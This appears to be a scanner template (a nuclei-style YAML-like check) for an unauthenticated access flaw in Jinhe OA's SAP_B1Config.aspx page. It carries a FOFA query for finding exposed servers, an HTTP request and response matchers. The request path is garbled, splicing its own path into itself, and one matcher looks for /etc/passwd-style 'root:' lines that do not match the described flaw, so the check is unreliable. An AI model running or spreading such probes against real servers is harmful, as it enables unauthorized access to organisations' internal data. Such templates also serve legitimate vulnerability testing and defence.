## id: VEID-2024-0107
## name: 金和OA_SAP_B1Config.aspx未授权访问漏洞
## author: hack007x
## severity: critical
## tags: veid,unauthorized,veid2024
## description:金和OA前台存在未授权访问,可查看内网信息
## fofa-query: app="金和网络-金和OA"
## verification: true



GET /C6/JHsoft./C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1CostEAI/SAP_B1Config.aspx/?manage=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}


#@ condition: and
#@ matcher: status_code == 200
#@ matcher: header["Content-Type"] contains "html"
#@ matcher: body matches /root:[^:]*:[0-9]+:[0-9]+:/





# @VEIL-STAMP: 64dd60d864424d2e6f718fab52b8b9cf1ad7310ad919be7214f3d77e4d581ffd
